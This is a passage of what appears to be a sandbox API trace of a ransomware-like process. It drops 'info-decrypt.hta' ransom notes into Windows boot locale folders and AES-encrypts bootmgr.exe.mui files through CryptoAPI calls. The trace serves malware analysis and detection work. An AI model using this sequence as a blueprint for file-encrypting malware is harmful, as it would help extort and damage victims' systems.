SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0182.376] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\info-decrypt.hta" (normalized: "c:\\boot\\pt-br\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320 [0182.377] GetFileType (hFile=0x320) returned 0x1 [0182.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0182.377] GetFileType (hFile=0x320) returned 0x1 [0182.378] WriteFile (in: hFile=0x320, lpBuffer=0x397f458*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x397f458*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0182.379] WriteFile (in: hFile=0x320, lpBuffer=0x397f458*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x397f458*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0182.380] CloseHandle (hObject=0x320) returned 1 [0182.380] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0182.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0182.380] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3980474 | out: lpFileInformation=0x3980474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040)) returned 1 [0182.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0182.381] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0182.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0182.381] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0182.381] GetFileType (hFile=0x320) returned 0x1 [0182.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0182.381] GetFileType (hFile=0x320) returned 0x1 [0182.381] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16040 [0182.381] ReadFile (in: hFile=0x320, lpBuffer=0x8cc7e88, nNumberOfBytesToRead=0x16040, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x8cc7e88*, lpNumberOfBytesRead=0x6a7f1bc*=0x16040, lpOverlapped=0x0) returned 1 [0182.384] CloseHandle (hObject=0x320) returned 1 [0182.385] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66bb0d0) returned 1 [0182.386] CryptGenRandom (in: hProv=0x66bb0d0, dwLen=0x10, pbBuffer=0x3980934 | out: pbBuffer=0x3980934) returned 1 [0185.389] CryptImportKey (in: hProv=0x66bb0d0, pbData=0x374de10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f5d0) returned 1 [0185.389] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.389] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.389] CryptDuplicateKey (in: hKey=0xb7f5d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f650) returned 1 [0185.389] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0185.389] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x4, pbData=0x374def0*=0x1, dwFlags=0x0) returned 1 [0185.389] CryptSetKeyParam (hKey=0xb7f650, dwParam=0x1, pbData=0x374debc, dwFlags=0x0) returned 1 [0185.390] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6d91018*, pdwDataLen=0x6a7f188*=0x16050, dwBufLen=0x16050 | out: pbData=0x6d91018*, pdwDataLen=0x6a7f188*=0x16050) returned 1 [0185.391] CryptEncrypt (in: hKey=0xb7f650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x374df18*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x374df18*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0185.635] CryptDestroyKey (hKey=0xb7f5d0) returned 1 [0185.635] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0185.635] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0185.635] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0185.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0185.636] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0185.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0185.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0185.637] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0185.637] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\", lpFilePart=0x0) returned 0xe [0185.637] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0185.638] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.638] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0185.638] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0185.639] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0185.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0185.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0185.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0185.639] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0185.639] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\", lpFilePart=0x0) returned 0xe [0185.639] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0185.639] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.639] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0185.640] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0185.640] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0185.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0185.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0185.640] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0185.640] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0185.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0185.640] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pt-PT\\info-decrypt.hta" (normalized: "c:\\boot\\pt-pt\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0185.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0185.640] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0185.640] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0185.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0185.640] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\info-decrypt.hta" (normalized: "c:\\boot\\pt-pt\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x208 [0185.641] GetFileType (hFile=0x208) returned 0x1 [0185.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0185.641] GetFileType (hFile=0x208) returned 0x1 [0185.641] WriteFile (in: hFile=0x208, lpBuffer=0x37b2364*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x37b2364*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0185.642] WriteFile (in: hFile=0x208, lpBuffer=0x37b2364*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x37b2364*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0185.642] CloseHandle (hObject=0x208) returned 1 [0185.643] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0185.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0185.643] GetFileAttributesExW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x37b3380 | out: lpFileInformation=0x37b3380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40)) returned 1 [0185.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0185.643] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0185.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0185.643] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x208 [0185.643] GetFileType (hFile=0x208) returned 0x1 [0185.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0185.643] GetFileType (hFile=0x208) returned 0x1 [0185.643] GetFileSize (in: hFile=0x208, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x15e40 [0185.644] ReadFile (in: hFile=0x208, lpBuffer=0x6da7088, nNumberOfBytesToRead=0x15e40, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x6da7088*, lpNumberOfBytesRead=0x6a7f1bc*=0x15e40, lpOverlapped=0x0) returned 1 [0185.646] CloseHandle (hObject=0x208) returned 1 [0185.646] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbdf8c0) returned 1 [0185.648] CryptGenRandom (in: hProv=0xbdf8c0, dwLen=0x10, pbBuffer=0x37b3840 | out: pbBuffer=0x37b3840) returned 1 [0186.120] CryptImportKey (in: hProv=0xbdf8c0, pbData=0x38aca10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f7d0) returned 1 [0186.120] CryptContextAddRef (hProv=0xbdf8c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.120] CryptContextAddRef (hProv=0xbdf8c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.120] CryptDuplicateKey (in: hKey=0xb7f7d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f790) returned 1 [0186.120] CryptContextAddRef (hProv=0xbdf8c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.120] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x4, pbData=0x38acaf0*=0x1, dwFlags=0x0) returned 1 [0186.121] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x1, pbData=0x38acabc, dwFlags=0x0) returned 1 [0186.121] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6dbcee8*, pdwDataLen=0x6a7f188*=0x15e50, dwBufLen=0x15e50 | out: pbData=0x6dbcee8*, pdwDataLen=0x6a7f188*=0x15e50) returned 1 [0186.122] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38acb18*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x38acb18*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0186.124] CryptDestroyKey (hKey=0xb7f7d0) returned 1 [0186.124] CryptReleaseContext (hProv=0xbdf8c0, dwFlags=0x0) returned 1 [0186.124] CryptReleaseContext (hProv=0xbdf8c0, dwFlags=0x0) returned 1 [0186.124] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0186.124] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0186.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0186.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0186.126] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0186.126] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\", lpFilePart=0x0) returned 0xe [0186.126] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f7d0 [0186.127] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.127] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0186.127] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0186.127] FindClose (in: hFindFile=0xb7f7d0 | out: hFindFile=0xb7f7d0) returned 1 [0186.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0186.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0186.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0186.128] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0186.128] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\", lpFilePart=0x0) returned 0xe [0186.128] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f7d0 [0186.128] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.128] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0186.128] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0186.129] FindClose (in: hFindFile=0xb7f7d0 | out: hFindFile=0xb7f7d0) returned 1 [0186.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0186.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0186.129] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: 